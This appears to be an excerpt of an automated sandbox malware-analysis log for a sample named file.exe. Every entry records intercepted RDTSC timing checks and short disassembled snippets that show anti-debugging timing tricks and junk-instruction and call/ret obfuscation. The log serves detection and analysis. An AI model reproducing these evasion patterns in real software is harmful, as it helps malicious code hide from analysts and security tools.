                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9ECBC second address: B9ECC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9ECC2 second address: B9ECC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9F78D second address: B9F793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9F793 second address: B9F797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA06FD second address: BA0707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007EFD6CF3F376h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1145 second address: BA1149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1149 second address: BA118A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007EFD6CF3F378h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 push 00000000h 0x00000023 add si, 78BDh 0x00000028 push 00000000h 0x0000002a mov esi, 09FC7AB1h 0x0000002f push eax 0x00000030 pushad 0x00000031 jne 00007EFD6CF3F378h 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1C2D second address: BA1C47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF89Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007EFD6CDBF896h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1C47 second address: BA1CE0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov edi, 26B747CCh 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007EFD6CF3F378h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 jnc 00007EFD6CF3F37Ch 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007EFD6CF3F378h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b jmp 00007EFD6CF3F37Eh 0x00000050 push esi 0x00000051 add di, 31B1h 0x00000056 pop esi 0x00000057 xchg eax, ebx 0x00000058 je 00007EFD6CF3F38Ch 0x0000005e jmp 00007EFD6CF3F386h 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 jg 00007EFD6CF3F378h 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1CE0 second address: BA1CEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007EFD6CDBF896h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2446 second address: BA2450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007EFD6CF3F376h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2450 second address: BA2454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2454 second address: BA246B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007EFD6CF3F37Ch 0x00000011 jg 00007EFD6CF3F376h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA246B second address: BA2470 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2F45 second address: BA2F4F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFD6CF3F37Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA95FF second address: BA960B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA960B second address: BA960F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA960F second address: BA9613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA9613 second address: BA9619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAA656 second address: BAA65A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAA65A second address: BAA67F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jp 00007EFD6CF3F376h 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007EFD6CF3F382h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAA67F second address: BAA683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAA683 second address: BAA691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007EFD6CF3F376h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAB5FC second address: BAB600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAB600 second address: BAB60A instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFD6CF3F376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAB60A second address: BAB697 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnp 00007EFD6CDBF896h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007EFD6CDBF898h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 jmp 00007EFD6CDBF8A3h 0x0000002e push 00000000h 0x00000030 mov bx, 488Ah 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007EFD6CDBF898h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 jmp 00007EFD6CDBF8A1h 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 push eax 0x0000005a pop eax 0x0000005b push edx 0x0000005c pop edx 0x0000005d popad 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA3A5E second address: BA3A6F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007EFD6CF3F376h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA3A6F second address: BA3A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA97E6 second address: BA97EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAD4BD second address: BAD51A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF89Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007EFD6CDBF898h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 movzx edi, bx 0x00000028 push 00000000h 0x0000002a mov di, AEE3h 0x0000002e push 00000000h 0x00000030 jo 00007EFD6CDBF899h 0x00000036 movsx ebx, bx 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007EFD6CDBF8A2h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAD51A second address: BAD524 instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFD6CF3F376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAE4DB second address: BAE555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007EFD6CDBF898h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 movzx ebx, bx 0x00000025 jg 00007EFD6CDBF8A3h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007EFD6CDBF898h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 0000001Bh 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 and bx, 3AACh 0x0000004c push 00000000h 0x0000004e mov bx, F6C4h 0x00000052 push eax 0x00000053 pushad 0x00000054 push ebx 0x00000055 push ecx 0x00000056 pop ecx 0x00000057 pop ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAF5E2 second address: BAF64B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D2EA8h], eax 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007EFD6CF3F378h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a sub dword ptr [ebp+122D17CCh], ebx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007EFD6CF3F378h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c cld 0x0000004d jg 00007EFD6CF3F37Ch 0x00000053 xchg eax, esi 0x00000054 push ebx 0x00000055 push eax 0x00000056 push edx 0x00000057 push ebx 0x00000058 pop ebx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB061A second address: BB061E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB061E second address: BB0628 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007EFD6CF3F376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0628 second address: BB062D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB15BF second address: BB15C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB15C5 second address: BB15C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB263E second address: BB2645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2645 second address: BB264C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAA79B second address: BAA834 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007EFD6CF3F37Ah 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e jg 00007EFD6CF3F37Ch 0x00000014 push dword ptr fs:[00000000h] 0x0000001b or di, C247h 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 or di, A744h 0x0000002c mov eax, dword ptr [ebp+122D1179h] 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007EFD6CF3F378h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c movsx edi, si 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push eax 0x00000054 call 00007EFD6CF3F378h 0x00000059 pop eax 0x0000005a mov dword ptr [esp+04h], eax 0x0000005e add dword ptr [esp+04h], 00000018h 0x00000066 inc eax 0x00000067 push eax 0x00000068 ret 0x00000069 pop eax 0x0000006a ret 0x0000006b movzx ebx, cx 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 jg 00007EFD6CF3F384h 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAB7E7 second address: BAB880 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007EFD6CDBF89Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jns 00007EFD6CDBF8A2h 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007EFD6CDBF898h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D1F98h], edi 0x00000035 push dword ptr fs:[00000000h] 0x0000003c jmp 00007EFD6CDBF8A9h 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 or edi, 2D17AF20h 0x0000004e mov eax, dword ptr [ebp+122D1581h] 0x00000054 mov bx, B942h 0x00000058 mov edi, dword ptr [ebp+122D1D85h] 0x0000005e push FFFFFFFFh 0x00000060 mov ebx, eax 0x00000062 nop 0x00000063 js 00007EFD6CDBF8A4h 0x00000069 push eax 0x0000006a push edx 0x0000006b push ecx 0x0000006c pop ecx 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB66B8 second address: BB66BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB66BC second address: BB66F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF8A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007EFD6CDBF8A5h 0x0000000e pop ecx 0x0000000f jo 00007EFD6CDBF8BFh 0x00000015 jl 00007EFD6CDBF8ABh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B632CD second address: B632D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6D8C second address: BB6D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6D92 second address: BB6E18 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007EFD6CF3F378h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 jmp 00007EFD6CF3F384h 0x0000002a push 00000000h 0x0000002c mov edi, 014DC69Bh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007EFD6CF3F378h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 jmp 00007EFD6CF3F383h 0x00000056 push ecx 0x00000057 pop ecx 0x00000058 popad 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB7DEB second address: BB7DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB7DEF second address: BB7DF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB8F10 second address: BB8F71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ebx, dword ptr [ebp+122D2BF5h] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007EFD6CDBF898h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D2F2Dh], eax 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+122D1E7Ch], esi 0x0000003b mov di, BBBEh 0x0000003f xchg eax, esi 0x00000040 jmp 00007EFD6CDBF8A3h 0x00000045 push eax 0x00000046 push eax 0x00000047 pushad 0x00000048 push ebx 0x00000049 pop ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBDC61 second address: BBDC6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007EFD6CF3F376h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB291E second address: BB292E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jng 00007EFD6CDBF8A0h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC82DE second address: BC82E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E23F second address: B5E254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF89Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCBE28 second address: BCBE2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCBE2C second address: BCBE32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCC434 second address: BCC439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCC569 second address: BCC56E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCC818 second address: BCC82A instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFD6CF3F37Ch 0x00000008 jl 00007EFD6CF3F376h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCC82A second address: BCC82E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCCB53 second address: BCCB6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007EFD6CF3F37Fh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCCB6E second address: BCCB9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007EFD6CDBF896h 0x0000000a popad 0x0000000b push eax 0x0000000c jnp 00007EFD6CDBF896h 0x00000012 jmp 00007EFD6CDBF8A9h 0x00000017 pop eax 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0F29 second address: BD0F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CF3F384h 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B57537 second address: B5755F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF89Eh 0x00000007 jmp 00007EFD6CDBF8A6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5755F second address: B575BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007EFD6CF3F376h 0x00000009 jmp 00007EFD6CF3F381h 0x0000000e jmp 00007EFD6CF3F383h 0x00000013 popad 0x00000014 jne 00007EFD6CF3F38Fh 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007EFD6CF3F37Ah 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD5EF2 second address: BD5F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jc 00007EFD6CDBF896h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD5F08 second address: BD5F18 instructions: 0x00000000 rdtsc 0x00000002 je 00007EFD6CF3F382h 0x00000008 ja 00007EFD6CF3F376h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDA45E second address: BDA462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDA462 second address: BDA46E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007EFD6CF3F376h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AB5A second address: B5AB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AB5E second address: B5AB63 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AB63 second address: B5AB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
